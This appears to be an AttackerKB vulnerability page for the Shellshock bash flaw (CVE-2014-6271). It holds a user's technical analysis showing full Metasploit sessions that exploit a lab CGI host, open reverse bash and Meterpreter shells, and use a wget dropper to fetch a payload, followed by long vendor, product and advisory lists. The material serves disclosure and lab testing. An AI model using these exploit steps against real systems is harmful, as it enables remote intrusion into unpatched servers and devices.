Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
2

CVE-2014-6271

Disclosure Date: September 24, 2014
CVE-2014-6271 CVSS v3 Base Score: 9.8
Exploited in the Wild
Reported by AttackerKB Worker and 3 more...
View Source Details
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Add Assessment

3
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Common in enterpriseEasy to weaponizeGives privileged accessUnauthenticatedVulnerable in default configuration
Technical Analysis

An Golden Oldie from 2014 that is still very relevant nowadays.

In my recent research of security vulnerabilities, I bumped into several targets that were still vulnerable to CVE-2014-6271 a.k.a. Shellshock and CVE-2014-6278. You should not be surprised that most of these targets are IoT based with an embedded Linux/Unix image running a vulnerable bash version. They typically do not get updated at all and are easy targets for a malicious actor to find an entry point into the network.

Metasploit modules like exploit/multi/http/apache_mod_cgi_bash_env_exec, are pretty restricted to launch an attack due to the limited platform support (only x86) and payloads that can be leveraged in an attack. This brought me to rewrite this module a bit so that it would support multiple platforms (ARM, x86, x64, MIPS) and multiple payloads such as Unix command and Linux Dropper. The module name is multi/http/bash_env_cgi_rce.

To test the module locally, you download a vulnerable bash version from https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz. Any version published before September 2014 is okay. Just extract it in a local directory and compile it with ./configure && make.

Configure an Apache or any other preferred web server to support CGI scripts. You can find tons of instructions on the web how to do that.
Just create a script like below using the vulnerable bash version and add this to the cgi-bin directory of your preferred web server.

#!/bin/bash_CVE_2014_6271
echo "Content-type: text/plain"
echo
echo
echo "Hello World"

Download module from here and follow the install instructions.
Start msfconsole and play around with the different options and payloads.

msf6 > use exploits/multi/http/bash_env_cgi_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bash_env_cgi_rce) > options

Module options (exploit/multi/http/bash_env_cgi_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CVE          Automatic        yes       CVE to check/exploit (Accepted: Automatic, CVE-2014-62
                                           71, CVE-2014-6278)
   HEADER       User-Agent       yes       HTTP header to use
   METHOD       GET              yes       HTTP method to use
   PAYLOADSIZE  2048             yes       Payload size used by the CmdStager
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port
                                           ][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/do
                                           cs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly
                                           generated)
   TARGETURI                     yes       Path to CGI script
   URIPATH                       no        The URI to use for this exploit (default is random)
   VHOST                         no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This mus
                                       t be an address on the local machine or 0.0.0.0 to listen
                                       on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/bash_env_cgi_rce) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set targeturi /cgi-bin/test.cgi
targeturi => /cgi-bin/test.cgi
msf6 exploit(multi/http/bash_env_cgi_rce) > check

[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] 192.168.201.10:80 - The target is vulnerable.
msf6 exploit(multi/http/bash_env_cgi_rce) > set lhost 192.168.201.10
lhost => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash using vulnerability CVE-2014-6271.
[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.10:35766) at 2023-05-21 15:01:17 +0000

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux

Python Meterpreter payload example

msf6 exploit(multi/http/bash_env_cgi_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp using vulnerability CVE-2014-6271.
[*] Sending stage (24772 bytes) to 192.168.201.10
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.10:35678) at 2023-05-21 15:03:48 +0000

meterpreter > sysinfo
Computer     : cerberus
OS           : Linux 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03)
Architecture : aarch64
Meterpreter  : python/linux
meterpreter > getuid
Server username: www-data
meterpreter >

Linux File dropper using payload: linux/aarch64/meterpreter_reverse_tcp

msf6 exploit(multi/http/bash_env_cgi_rce) > set target 1
target => 1
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set CMDSTAGER::FLAVOR wget
CMDSTAGER::FLAVOR => wget
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp using vulnerability CVE-2014-6271.
[*] Using URL: http://192.168.201.10:8080/ZzirBKe
[*] Client 192.168.201.10 (Wget/1.21.3) requested /ZzirBKe
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.10:34346) at 2023-05-21 15:10:11 +0000
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >

If you use CMDSTAGER::FLAVOR option bourne or printf, please ensure that your payload size is 2048 or below.
You can control this with the option PAYLOADSIZE

Have fun !!!

References

Metasploit module multi/http/bash_env_cgi_rce

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
n/a
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
exploit/osx/local/vmware_bash_function_root
exploit/multi/http/apache_mod_cgi_bash_env_exec
exploit/linux/http/advantech_switch_bash_env_exec
exploit/unix/dhcp/bash_environment
exploit/linux/http/ipfire_bashbug_exec
exploit/multi/ftp/pureftpd_bash_env_exec
auxiliary/scanner/http/apache_mod_cgi_bash_env
auxiliary/server/dhclient_bash_env
exploit/multi/http/cups_bash_env_exec
exploit/unix/smtp/qmail_bash_env_exec
Reporter
Unknown

Vendors

  • apple,
  • arista,
  • canonical,
  • checkpoint,
  • citrix,
  • debian,
  • f5,
  • gnu,
  • ibm,
  • mageia,
  • novell,
  • opensuse,
  • oracle,
  • qnap,
  • redhat,
  • suse,
  • vmware

Products

  • arx firmware,
  • bash,
  • big-ip access policy manager,
  • big-ip access policy manager 11.6.0,
  • big-ip advanced firewall manager,
  • big-ip advanced firewall manager 11.6.0,
  • big-ip analytics,
  • big-ip analytics 11.6.0,
  • big-ip application acceleration manager,
  • big-ip application acceleration manager 11.6.0,
  • big-ip application security manager,
  • big-ip application security manager 11.6.0,
  • big-ip edge gateway,
  • big-ip global traffic manager,
  • big-ip global traffic manager 11.6.0,
  • big-ip link controller,
  • big-ip link controller 11.6.0,
  • big-ip local traffic manager,
  • big-ip local traffic manager 11.6.0,
  • big-ip policy enforcement manager,
  • big-ip policy enforcement manager 11.6.0,
  • big-ip protocol security module,
  • big-ip wan optimization manager,
  • big-ip webaccelerator,
  • big-iq cloud,
  • big-iq device,
  • big-iq security,
  • debian linux 7.0,
  • enterprise linux 4.0,
  • enterprise linux 5.0,
  • enterprise linux 6.0,
  • enterprise linux 7.0,
  • enterprise linux desktop 5.0,
  • enterprise linux desktop 6.0,
  • enterprise linux desktop 7.0,
  • enterprise linux eus 5.9,
  • enterprise linux eus 6.4,
  • enterprise linux eus 6.5,
  • enterprise linux eus 7.3,
  • enterprise linux eus 7.4,
  • enterprise linux eus 7.5,
  • enterprise linux eus 7.6,
  • enterprise linux eus 7.7,
  • enterprise linux for ibm z systems 5.9 s390x,
  • enterprise linux for ibm z systems 6.4 s390x,
  • enterprise linux for ibm z systems 6.5 s390x,
  • enterprise linux for ibm z systems 7.3 s390x,
  • enterprise linux for ibm z systems 7.4 s390x,
  • enterprise linux for ibm z systems 7.5 s390x,
  • enterprise linux for ibm z systems 7.6 s390x,
  • enterprise linux for ibm z systems 7.7 s390x,
  • enterprise linux for power big endian 5.0 ppc,
  • enterprise linux for power big endian 5.9 ppc,
  • enterprise linux for power big endian 6.0 ppc64,
  • enterprise linux for power big endian 6.4 ppc64,
  • enterprise linux for power big endian 7.0 ppc64,
  • enterprise linux for power big endian eus 6.5 ppc64,
  • enterprise linux for power big endian eus 7.3 ppc64,
  • enterprise linux for power big endian eus 7.4 ppc64,
  • enterprise linux for power big endian eus 7.5 ppc64,
  • enterprise linux for power big endian eus 7.6 ppc64,
  • enterprise linux for power big endian eus 7.7 ppc64,
  • enterprise linux for scientific computing 6.0,
  • enterprise linux for scientific computing 7.0,
  • enterprise linux server 5.0,
  • enterprise linux server 6.0,
  • enterprise linux server 7.0,
  • enterprise linux server aus 5.6,
  • enterprise linux server aus 5.9,
  • enterprise linux server aus 6.2,
  • enterprise linux server aus 6.4,
  • enterprise linux server aus 6.5,
  • enterprise linux server aus 7.3,
  • enterprise linux server aus 7.4,
  • enterprise linux server aus 7.6,
  • enterprise linux server aus 7.7,
  • enterprise linux server from rhui 5.0,
  • enterprise linux server from rhui 6.0,
  • enterprise linux server from rhui 7.0,
  • enterprise linux server tus 6.5,
  • enterprise linux server tus 7.3,
  • enterprise linux server tus 7.6,
  • enterprise linux server tus 7.7,
  • enterprise linux workstation 5.0,
  • enterprise linux workstation 6.0,
  • enterprise linux workstation 7.0,
  • enterprise manager,
  • eos,
  • esx 4.0,
  • esx 4.1,
  • flex system v7000 firmware,
  • gluster storage server for on-premise 2.1,
  • infosphere guardium database activity monitoring 8.2,
  • infosphere guardium database activity monitoring 9.0,
  • infosphere guardium database activity monitoring 9.1,
  • linux 4,
  • linux 5,
  • linux 6,
  • linux enterprise desktop 11,
  • linux enterprise desktop 12,
  • linux enterprise server 10,
  • linux enterprise server 11,
  • linux enterprise server 12,
  • linux enterprise software development kit 11,
  • linux enterprise software development kit 12,
  • mac os x,
  • mageia 3.0,
  • mageia 4.0,
  • netscaler sdx firmware,
  • open enterprise server 11.0,
  • open enterprise server 2.0,
  • opensuse 12.3,
  • opensuse 13.1,
  • opensuse 13.2,
  • pureapplication system,
  • pureapplication system 2.0.0.0,
  • qradar risk manager 7.1.0,
  • qradar security information and event manager 7.1.0,
  • qradar security information and event manager 7.1.1,
  • qradar security information and event manager 7.1.2,
  • qradar security information and event manager 7.2,
  • qradar security information and event manager 7.2.0,
  • qradar security information and event manager 7.2.1,
  • qradar security information and event manager 7.2.2,
  • qradar security information and event manager 7.2.3,
  • qradar security information and event manager 7.2.4,
  • qradar security information and event manager 7.2.5,
  • qradar security information and event manager 7.2.6,
  • qradar security information and event manager 7.2.7,
  • qradar security information and event manager 7.2.8,
  • qradar security information and event manager 7.2.8.15,
  • qradar security information and event manager 7.2.9,
  • qradar vulnerability manager 7.2.0,
  • qradar vulnerability manager 7.2.1,
  • qradar vulnerability manager 7.2.2,
  • qradar vulnerability manager 7.2.3,
  • qradar vulnerability manager 7.2.4,
  • qradar vulnerability manager 7.2.6,
  • qradar vulnerability manager 7.2.8,
  • qts,
  • qts 4.1.1,
  • san volume controller firmware,
  • security access manager for mobile 8.0 firmware 8.0.0.1,
  • security access manager for mobile 8.0 firmware 8.0.0.2,
  • security access manager for mobile 8.0 firmware 8.0.0.3,
  • security access manager for mobile 8.0 firmware 8.0.0.5,
  • security access manager for web 7.0 firmware 7.0.0.1,
  • security access manager for web 7.0 firmware 7.0.0.2,
  • security access manager for web 7.0 firmware 7.0.0.3,
  • security access manager for web 7.0 firmware 7.0.0.4,
  • security access manager for web 7.0 firmware 7.0.0.5,
  • security access manager for web 7.0 firmware 7.0.0.6,
  • security access manager for web 7.0 firmware 7.0.0.7,
  • security access manager for web 7.0 firmware 7.0.0.8,
  • security access manager for web 8.0 firmware 8.0.0.2,
  • security access manager for web 8.0 firmware 8.0.0.3,
  • security access manager for web 8.0 firmware 8.0.0.5,
  • security gateway,
  • smartcloud entry appliance 2.3.0,
  • smartcloud entry appliance 2.4.0,
  • smartcloud entry appliance 3.1.0,
  • smartcloud entry appliance 3.2.0,
  • smartcloud provisioning 2.1.0,
  • software defined network for virtual environments,
  • starter kit for cloud 2.2.0,
  • stn6500 firmware,
  • stn6800 firmware,
  • stn7800 firmware,
  • storwize v3500 firmware,
  • storwize v3700 firmware,
  • storwize v5000 firmware,
  • storwize v7000 firmware,
  • studio onsite 1.3,
  • traffix signaling delivery controller,
  • traffix signaling delivery controller 3.3.2,
  • traffix signaling delivery controller 3.4.1,
  • traffix signaling delivery controller 3.5.1,
  • traffix signaling delivery controller 4.1.0,
  • ubuntu linux 10.04,
  • ubuntu linux 12.04,
  • ubuntu linux 14.04,
  • vcenter server appliance 5.0,
  • vcenter server appliance 5.1,
  • vcenter server appliance 5.5,
  • virtualization 3.4,
  • workload deployer,
  • zenworks configuration management 10.3,
  • zenworks configuration management 11,
  • zenworks configuration management 11.1,
  • zenworks configuration management 11.2,
  • zenworks configuration management 11.3.0

Metasploit Modules

Dhclient Bash Environment Variable Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment.rb)
DHCP Client Bash Environment Variable Code Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb)
CUPS Filter Bash Environment Variable Code Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/cups_bash_env_exec.rb)
OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb)
Advantech Switch Bash Environment Variable Code Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb)
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb)
IPFire Bash Environment Variable Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ipfire_bashbug_exec.rb)
Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb)
Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb)
Qmail SMTP Bash Environment Variable Injection (Shellshock) (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/smtp/qmail_bash_env_exec.rb)

Exploited in the Wild

Reported by:

References

Canonical
CVE-2014-6271 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)
BID-70103 (http://www.securityfocus.com/bid/70103)
Advisory
EXPLOIT-DB-37816 (https://www.exploit-db.com/exploits/37816)
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.html
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004897
http://www-01.ibm.com/support/docview.wss?uid=swg21685749
HPSBMU03165 (http://marc.info?l=bugtraq&m=141577137423233&w=2)
SSRT101816 (http://marc.info?l=bugtraq&m=142719845423222&w=2)
EXPLOIT-DB-39918 (https://www.exploit-db.com/exploits/39918)
HPSBHF03119 (http://marc.info?l=bugtraq&m=141216668515282&w=2)
http://rhn.redhat.com/errata/RHSA-2014-1295.html
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.html
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673&src=securityAlerts
HPSBST03131 (http://marc.info?l=bugtraq&m=141383138121313&w=2)
SSRT101819 (http://marc.info?l=bugtraq&m=142721162228379&w=2)
20141001 NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities (http://www.securityfocus.com/archive/1/533593/100/0/threaded)
HPSBMU03245 (http://marc.info?l=bugtraq&m=142358026505815&w=2)
http://www-01.ibm.com/support/docview.wss?uid=swg21686084
http://www-01.ibm.com/support/docview.wss?uid=swg21686479
SECUNIA-61188 (http://secunia.com/advisories/61188)
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
JVN#55667175 (http://jvn.jp/en/jp/JVN55667175/index.html)
SECUNIA-61676 (http://secunia.com/advisories/61676)
EXPLOIT-DB-40619 (https://www.exploit-db.com/exploits/40619)
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html
SECUNIA-60433 (http://secunia.com/advisories/60433)
EXPLOIT-DB-38849 (https://www.exploit-db.com/exploits/38849)
HPSBMU03143 (http://marc.info?l=bugtraq&m=141383026420882&w=2)
HPSBMU03182 (http://marc.info?l=bugtraq&m=141585637922673&w=2)
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10673
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.html
HPSBST03155 (http://marc.info?l=bugtraq&m=141576728022234&w=2)
http://www-01.ibm.com/support/docview.wss?uid=swg21685541
SECUNIA-61715 (http://secunia.com/advisories/61715)
http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html
SECUNIA-61816 (http://secunia.com/advisories/61816)
http://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html
SECUNIA-61442 (http://secunia.com/advisories/61442)
HPSBMU03246 (http://marc.info?l=bugtraq&m=142358078406056&w=2)
HPSBST03195 (http://marc.info?l=bugtraq&m=142805027510172&w=2)
SECUNIA-61283 (http://secunia.com/advisories/61283)
SSRT101711 (http://marc.info?l=bugtraq&m=142113462216480&w=2)
USN-2362-1 (http://www.ubuntu.com/usn/USN-2362-1)
https://kc.mcafee.com/corporate/index?page=content&id=SB10085
http://lists.opensuse.org/opensuse-updates/2014-10/msg00023.html
SECUNIA-61654 (http://secunia.com/advisories/61654)
SECUNIA-61542 (http://secunia.com/advisories/61542)
http://www.novell.com/support/kb/doc.php?id=7015701
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096315
SECUNIA-62312 (http://secunia.com/advisories/62312)
SECUNIA-59272 (http://secunia.com/advisories/59272)
HPSBST03122 (http://marc.info?l=bugtraq&m=141319209015420&w=2)
https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html
HPSBMU03217 (http://marc.info?l=bugtraq&m=141879528318582&w=2)
http://www-01.ibm.com/support/docview.wss?uid=swg21685604
SSRT101868 (http://marc.info?l=bugtraq&m=142118135300698&w=2)
SECUNIA-61703 (http://secunia.com/advisories/61703)
http://support.apple.com/kb/HT6495
VU#252743 (http://www.kb.cert.org/vuls/id/252743)
SECUNIA-61065 (http://secunia.com/advisories/61065)
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.html
HPSBST03129 (http://marc.info?l=bugtraq&m=141383196021590&w=2)
HPSBMU03144 (http://marc.info?l=bugtraq&m=141383081521087&w=2)
http://www-01.ibm.com/support/docview.wss?uid=swg21686445
http://www-01.ibm.com/support/docview.wss?uid=swg21686131
JVNDB-2014-000126 (http://jvndb.jvn.jp/jvndb/JVNDB-2014-000126)
TA14-268A (http://www.us-cert.gov/ncas/alerts/TA14-268A)
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.html
SECUNIA-61641 (http://secunia.com/advisories/61641)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648
https://access.redhat.com/node/1200223
http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.html
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004898
APPLE-SA-2014-10-16-1 (http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html)
http://www-01.ibm.com/support/docview.wss?uid=swg21685914
20141001 FW: NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities (http://seclists.org/fulldisclosure/2014/Oct/0)
http://www.mandriva.com/security/advisories?name=MDVSA-2015:164
http://rhn.redhat.com/errata/RHSA-2014-1293.html
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04497075
http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.html
SECUNIA-60325 (http://secunia.com/advisories/60325)
https://help.ecostruxureit.com/display/public/UADCO8x/StruxureWare+Data+Center+Operation+Software+Vulnerability+Fixes
SECUNIA-60024 (http://secunia.com/advisories/60024)
EXPLOIT-DB-34879 (https://www.exploit-db.com/exploits/34879)
https://access.redhat.com/articles/1200223
SECUNIA-62343 (http://secunia.com/advisories/62343)
SECUNIA-61565 (http://secunia.com/advisories/61565)
https://www.suse.com/support/shellshock
HPSBST03157 (http://marc.info?l=bugtraq&m=141450491804793&w=2)
SECUNIA-61313 (http://secunia.com/advisories/61313)
SECUNIA-61873 (http://secunia.com/advisories/61873)
SECUNIA-61485 (http://secunia.com/advisories/61485)
SECUNIA-60947 (http://secunia.com/advisories/60947)
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04518183
https://support.apple.com/kb/HT6535
HPSBST03154 (http://marc.info?l=bugtraq&m=141577297623641&w=2)
HPSBST03265 (http://marc.info?l=bugtraq&m=142546741516006&w=2)
http://www-01.ibm.com/support/docview.wss?uid=isg3T1021272
HPSBGN03142 (http://marc.info?l=bugtraq&m=141383244821813&w=2)
SECUNIA-61312 (http://secunia.com/advisories/61312)
SECUNIA-60193 (http://secunia.com/advisories/60193)
http://www.vmware.com/security/advisories/VMSA-2014-0010.html
http://linux.oracle.com/errata/ELSA-2014-1294.html
SECUNIA-60063 (http://secunia.com/advisories/60063)
SECUNIA-60034 (http://secunia.com/advisories/60034)
HPSBMU03133 (http://marc.info?l=bugtraq&m=141330425327438&w=2)
SECUNIA-59907 (http://secunia.com/advisories/59907)
SECUNIA-58200 (http://secunia.com/advisories/58200)
HPSBST03181 (http://marc.info?l=bugtraq&m=141577241923505&w=2)
SECUNIA-61643 (http://secunia.com/advisories/61643)
http://www.novell.com/support/kb/doc.php?id=7015721
http://www-01.ibm.com/support/docview.wss?uid=swg21687079
SECUNIA-61503 (http://secunia.com/advisories/61503)
http://www-01.ibm.com/support/docview.wss?uid=swg21686246
http://rhn.redhat.com/errata/RHSA-2014-1354.html
EXPLOIT-DB-40938 (https://www.exploit-db.com/exploits/40938)
HPSBGN03117 (http://marc.info?l=bugtraq&m=141216207813411&w=2)
http://support.novell.com/security/cve/CVE-2014-6271.html
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004915
SECUNIA-61547 (http://secunia.com/advisories/61547)
HPSBHF03145 (http://marc.info?l=bugtraq&m=141383465822787&w=2)
http://www.qnap.com/i/en/support/con_show.php?cid=61
HPSBST03148 (http://marc.info?l=bugtraq&m=141694386919794&w=2)
SECUNIA-61552 (http://secunia.com/advisories/61552)
SECUNIA-61780 (http://secunia.com/advisories/61780)
http://www-01.ibm.com/support/docview.wss?uid=isg3T1021279
https://support.citrix.com/article/CTX200223
DSA-3032 (http://www.debian.org/security/2014/dsa-3032)
http://www-01.ibm.com/support/docview.wss?uid=swg21686447
SECUNIA-62228 (http://secunia.com/advisories/62228)
HPSBGN03138 (http://marc.info?l=bugtraq&m=141330468527613&w=2)
SECUNIA-61855 (http://secunia.com/advisories/61855)
HPSBHF03124 (http://marc.info?l=bugtraq&m=141235957116749&w=2)
SECUNIA-60044 (http://secunia.com/advisories/60044)
SECUNIA-61291 (http://secunia.com/advisories/61291)
http://rhn.redhat.com/errata/RHSA-2014-1294.html
HPSBHF03125 (http://marc.info?l=bugtraq&m=141345648114150&w=2)
SECUNIA-59737 (http://secunia.com/advisories/59737)
SECUNIA-61287 (http://secunia.com/advisories/61287)
HPSBHF03146 (http://marc.info?l=bugtraq&m=141383353622268&w=2)
https://bugzilla.redhat.com/show_bug.cgi?id=1141597
SECUNIA-61711 (http://secunia.com/advisories/61711)
http://www-01.ibm.com/support/docview.wss?uid=isg3T1021361
HPSBGN03141 (http://marc.info?l=bugtraq&m=141383304022067&w=2)
http://advisories.mageia.org/MGASA-2014-0388.html
SECUNIA-61128 (http://secunia.com/advisories/61128)
https://support.citrix.com/article/CTX200217
SECUNIA-61471 (http://secunia.com/advisories/61471)
SECUNIA-60055 (http://secunia.com/advisories/60055)
20140926 GNU Bash Environmental Variable Command Injection Vulnerability (http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash)
SECUNIA-61550 (http://secunia.com/advisories/61550)
SECUNIA-61633 (http://secunia.com/advisories/61633)
http://linux.oracle.com/errata/ELSA-2014-1293.html
http://www-01.ibm.com/support/docview.wss?uid=swg21686494
https://kb.bluecoat.com/index?page=content&id=SA82
SECUNIA-61328 (http://secunia.com/advisories/61328)
http://www-01.ibm.com/support/docview.wss?uid=swg21685733
EXPLOIT-DB-42938 (https://www.exploit-db.com/exploits/42938)
SECUNIA-61129 (http://secunia.com/advisories/61129)
SECUNIA-61700 (http://secunia.com/advisories/61700)
SECUNIA-61603 (http://secunia.com/advisories/61603)
SECUNIA-61857 (http://secunia.com/advisories/61857)
http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004879
EXPLOIT-DB-37816 (https://www.exploit-db.com/exploits/37816/)
HPSBMU03165 (http://marc.info/?l=bugtraq&m=141577137423233&w=2)
SSRT101816 (http://marc.info/?l=bugtraq&m=142719845423222&w=2)
EXPLOIT-DB-39918 (https://www.exploit-db.com/exploits/39918/)
HPSBHF03119 (http://marc.info/?l=bugtraq&m=141216668515282&w=2)
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
HPSBST03131 (http://marc.info/?l=bugtraq&m=141383138121313&w=2)
SSRT101819 (http://marc.info/?l=bugtraq&m=142721162228379&w=2)
HPSBMU03245 (http://marc.info/?l=bugtraq&m=142358026505815&w=2)
EXPLOIT-DB-40619 (https://www.exploit-db.com/exploits/40619/)
EXPLOIT-DB-38849 (https://www.exploit-db.com/exploits/38849/)
HPSBMU03143 (http://marc.info/?l=bugtraq&m=141383026420882&w=2)
HPSBMU03182 (http://marc.info/?l=bugtraq&m=141585637922673&w=2)
HPSBST03155 (http://marc.info/?l=bugtraq&m=141576728022234&w=2)
HPSBMU03246 (http://marc.info/?l=bugtraq&m=142358078406056&w=2)
HPSBST03195 (http://marc.info/?l=bugtraq&m=142805027510172&w=2)
SSRT101711 (http://marc.info/?l=bugtraq&m=142113462216480&w=2)
HPSBST03122 (http://marc.info/?l=bugtraq&m=141319209015420&w=2)
HPSBMU03217 (http://marc.info/?l=bugtraq&m=141879528318582&w=2)
SSRT101868 (http://marc.info/?l=bugtraq&m=142118135300698&w=2)
HPSBST03129 (http://marc.info/?l=bugtraq&m=141383196021590&w=2)
HPSBMU03144 (http://marc.info/?l=bugtraq&m=141383081521087&w=2)
EXPLOIT-DB-34879 (https://www.exploit-db.com/exploits/34879/)
https://www.suse.com/support/shellshock/
HPSBST03157 (http://marc.info/?l=bugtraq&m=141450491804793&w=2)
HPSBST03154 (http://marc.info/?l=bugtraq&m=141577297623641&w=2)
